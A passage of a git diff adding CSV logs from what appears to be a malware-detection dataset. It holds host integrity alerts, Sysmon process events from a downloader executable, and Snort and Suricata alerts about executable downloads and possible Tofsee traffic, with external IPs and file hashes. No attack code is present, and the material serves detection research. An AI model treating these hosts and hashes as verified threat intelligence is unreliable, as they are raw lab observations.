'619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 13:18:28.419",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: 'da7d4a494ab65f84a64fbfa6593fc10a' +New md5sum is : '57ab90e49fe60d2be51eb285e9aa2af6' +Old sha1sum was: 'a93a8ea22c6279318ef6c52861871046ca4d8125' +New sha1sum is : 'e505871f21b51c8ee06d585c67180c9392dc7511' +" +"Apr 6, 2020 @ 13:18:28.356",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '2748a7b4da870a32112c36673bab4670' +New md5sum is : 'ce601cdb843959a2c4f6befe0c7a2242' +Old sha1sum was: '77bb6b47213ee60fe9afadedeffb609bc118633b' +New sha1sum is : '4f6e60f4444ced9303606d3b4d79d2fc73df8c24' +" +"Apr 6, 2020 @ 13:18:27.276",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '67b63b70acc4cf09439b0064f5375078' +New md5sum is : '606d75503289ffec78fec11236a6353e' +Old sha1sum was: 'd5ad2ffed235439932f7b3d18a9d28ffe83d1079' +New sha1sum is : '33248c131c57ed1e3d99fa341dabe7bf3cbac974' +" +"Apr 6, 2020 @ 13:18:12.496",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\McAfee WebAdvisor' was added. +" +"Apr 6, 2020 @ 13:17:55.089",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application' checksum changed. +Old md5sum was: 'ca58d19f0c9bad004f0001f1f20d2ec6' +New md5sum is : '1f7c0d45cd1e28c3bc36a36dfbc11be4' +Old sha1sum was: '99d37a9ea975185bf3abd2260ba7f66cd229d7df' +New sha1sum is : '6e303174be9c95270e57c3ae64488f653ba41af7' +" +"Apr 6, 2020 @ 13:17:51.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\ByteFenceService' was added. +" +"Apr 6, 2020 @ 13:17:45.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ByteFenceService' was added. +" +"Apr 6, 2020 @ 13:17:43.025",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +" +"Apr 6, 2020 @ 13:17:41.636",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '6f93271d69b72b17c57d0ed14a8d7124' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '43fd4f6341a282d60eb432c42415afc3f46dc022' +" +"Apr 6, 2020 @ 13:17:37.574",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\TabbedBrowsing' was added. +" +"Apr 6, 2020 @ 13:17:36.433",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}' was added. +" +"Apr 6, 2020 @ 13:17:36.418",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}' checksum changed. +Old md5sum was: 'eabef0d1f7faf9368acee28f84f9b211' +New md5sum is : '2a569169f4c48da58d55d87631b3625e' +Old sha1sum was: 'be8f5aa697bbfd3ee56c683cc08676dc72effdcd' +New sha1sum is : '2ff153ca41593d1937308f478acf09efa60a0930' +" +"Apr 6, 2020 @ 13:17:31.245",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}' was added. +" +"Apr 6, 2020 @ 13:17:31.231",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0804' was added. +" +"Apr 6, 2020 @ 13:17:31.199",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0412' was added. +" +"Apr 6, 2020 @ 13:17:31.182",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0411' was added. +" +"Apr 6, 2020 @ 13:17:09.808",5,"New Windows Service Created", +"Apr 6, 2020 @ 13:16:48.667",5,"New Windows Service Created", diff --git a/data/MW_21_HIDS_3.csv b/data/MW_21_HIDS_3.csv new file mode 100644 index 0000000..856d4fb --- /dev/null +++ b/data/MW_21_HIDS_3.csv @@ -0,0 +1,98 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 24, 2020 @ 13:35:49.671",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +" +"May 24, 2020 @ 13:35:48.592",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '8535e71303cbabe6816cd4f197652bc8' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '46940de4369c12b1d1c24136f4fe3108925e9678' +" +"May 24, 2020 @ 13:35:48.576",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'be8a4b502546da3087f02371f0f02c17' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'bd49702c05c290aaa23685f3c33157cdf7b4ee52' +" +"May 24, 2020 @ 13:35:12.904",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"May 24, 2020 @ 13:35:02.451",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"May 24, 2020 @ 13:34:21.640",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 24, 2020 @ 13:34:14.404",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 24, 2020 @ 13:33:28.276",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 24, 2020 @ 13:33:28.258",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 24, 2020 @ 13:30:39.703",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6192; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryFullChargedCapacity; ResultCode = 0x80041010; PossibleCause = Unknown""",, +"May 24, 2020 @ 13:28:02.455",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 24, 2020 @ 13:27:44.693",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:59.936 +ProcessGuid: {df9fc3d3-d17f-5ec7-0000-001067a21a00} +ProcessId: 5328 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-d0cd-5ec7-0000-0010ccbb0000} +ParentProcessId: 724 +ParentImage: C:\Windows\System32\svchost.exe +ParentCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p""","C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:59.943722400Z"",""eventRecordID"":""1087"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:59.936\r\nProcessGuid: {df9fc3d3-d17f-5ec7-0000-001067a21a00}\r\nProcessId: 5328\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-d0cd-5ec7-0000-0010ccbb0000}\r\nParentProcessId: 724\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:59.936"",""processGuid"":""{df9fc3d3-d17f-5ec7-0000-001067a21a00}"",""processId"":""5328"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-d0cd-5ec7-0000-0010ccbb0000}"",""parentProcessId"":""724"",""parentImage"":""C:\\\\Windows\\\\System32\\\\svchost.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p""}}}" +"May 24, 2020 @ 13:27:44.667",14,"ATT&CK T1036: System File Execution Location Anomaly","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:59.743 +ProcessGuid: {df9fc3d3-d17f-5ec7-0000-00106e921a00} +ProcessId: 4488 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: ""C:\Windows\System32\explorer.exe"" /select, ""C:\Users\John Williams\Downloads\Free Alts.txt"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300} +LogonId: 0x301DF +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-d161-5ec7-0000-00101c201600} +ParentProcessId: 5868 +ParentImage: C:\Users\John Williams\Downloads\thisis - Linkvertise Downloader_4159543738.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\thisis - Linkvertise Downloader_4159543738.exe"" RSF /ppn:YyhwYgxaFRAiP211FM5W /mnl""","\""C:\\Windows\\System32\\explorer.exe\"" /select, \""C:\\Users\\John Williams\\Downloads\\Free Alts.txt\""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:59.831367900Z"",""eventRecordID"":""1086"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:59.743\r\nProcessGuid: {df9fc3d3-d17f-5ec7-0000-00106e921a00}\r\nProcessId: 4488\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: \""C:\\Windows\\System32\\explorer.exe\"" /select, \""C:\\Users\\John Williams\\Downloads\\Free Alts.txt\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300}\r\nLogonId: 0x301DF\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-d161-5ec7-0000-00101c201600}\r\nParentProcessId: 5868\r\nParentImage: C:\\Users\\John Williams\\Downloads\\thisis - Linkvertise Downloader_4159543738.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\thisis - Linkvertise Downloader_4159543738.exe\"" RSF /ppn:YyhwYgxaFRAiP211FM5W /mnl\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:59.743"",""processGuid"":""{df9fc3d3-d17f-5ec7-0000-00106e921a00}"",""processId"":""4488"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\explorer.exe\\\"" /select, \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Free Alts.txt\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-0020df010300}"",""logonId"":""0x301df"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-d161-5ec7-0000-00101c201600}"",""parentProcessId"":""5868"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\thisis - Linkvertise Downloader_4159543738.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\thisis - Linkvertise Downloader_4159543738.exe\\\"" RSF /ppn:YyhwYgxaFRAiP211FM5W /mnl""}}}" diff --git a/data/MW_21_NIDS.csv b/data/MW_21_NIDS.csv new file mode 100644 index 0000000..39c426c --- /dev/null +++ b/data/MW_21_NIDS.csv @@ -0,0 +1,19 @@ +"@timestamp",message,"log.file.path" +"Apr 6, 2020 @ 13:28:04.955","04/06/2020-13:28:03.278729 [**] [1:2013414:10] ET POLICY Executable served from Amazon S3 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:28:04.955","04/06/2020-13:28:03.279586 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:28:04.955","04/06/2020-13:28:03.279586 [**] [1:2016538:3] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264275 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264275 [**] [1:2016538:2] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264275 [**] [1:2016538:2] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264274 [**] [1:2013414:5] ET POLICY Executable served from Amazon S3 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:16:47.908","04/06-13:16:46.599153 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:16:47.908","04/06-13:16:46.599153 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:16:47.908","04/06/2020-13:16:46.700803 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:16:47.908","04/06/2020-13:16:46.700803 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:16:44.906","04/06-13:16:42.021205 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:16:44.906","04/06-13:16:42.021205 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 13:16:44.906","04/06/2020-13:16:42.119180 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:16:44.906","04/06/2020-13:16:42.119180 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:16:37.891","04/06/2020-13:16:36.859221 [**] [1:2028810:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49925 -> 205.196.123.34:443","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:16:37.890","04/06/2020-13:16:36.116915 [**] [1:2028810:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49923 -> 205.196.123.34:443","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 13:16:34.888","04/06/2020-13:16:34.357952 [**] [1:2028810:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49920 -> 104.28.11.72:443","/var/log/suricata/fast.log" diff --git a/data/MW_22_HIDS_1.csv b/data/MW_22_HIDS_1.csv new file mode 100644 index 0000000..749842a --- /dev/null +++ b/data/MW_22_HIDS_1.csv @@ -0,0 +1,1188 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 14:40:01.945",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:39:58.381",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 14:39:58.366",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 14:39:51.069",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'c4a796c4c34771728ed542fd1a758c62' +New md5sum is : '93c2f688a68bea92ca0316b543b731f9' +Old sha1sum was: '6390383b035997e115a3b000b6de17b37d1d41e4' +New sha1sum is : '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +" +"Apr 6, 2020 @ 14:39:51.053",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '2a59348304c018619f9ec9335491c9b3' +New md5sum is : 'a0df8d6e879d924da3288b2aa0b85114' +Old sha1sum was: '8b9b67bed7bf33200a32a2aebb4f71c9fae666aa' +New sha1sum is : '5b3369bb152c26552a26be399f0ea043686a36fe' +" +"Apr 6, 2020 @ 14:39:49.709",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: 'a94ecbd5eaeee72bd7ceca1faad96e30' +New md5sum is : '49574a9da5b73510ecb8125c7786d037' +Old sha1sum was: '269518a35686493cde84837b1668ea322e4d3d13' +New sha1sum is : 'fc3c9a4be6b806a974693af1dc528845db7631da' +" +"Apr 6, 2020 @ 14:39:39.131",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '729d0877659e4797d3983fddb4576047' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '109945df285ffff37e08eaab1d91e55cb59c26c8' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +" +"Apr 6, 2020 @ 14:39:39.100",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '756dd006ccddd9a3acb123069bbf2b72' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: 'ad92ac4e2be1d65930f4d4ed78dab3ae8577c070' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 6, 2020 @ 14:39:39.084",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'b0fa798f750e19e3ddbcd77f4321253f' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: '759d4aa41127af628c11a6761e1f5d9bdf9412ed' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" +"Apr 6, 2020 @ 14:39:38.288",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '4dc723cacf24668548d4626cd43a3355' +New md5sum is : 'a6934418b12b085c34f2dbaa9e9fa7a0' +Old sha1sum was: 'd81ab069195c4657ae5fbbccadc8597e7deedd15' +New sha1sum is : 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +" +"Apr 6, 2020 @ 14:39:36.944",7,"Integrity checksum changed.","File 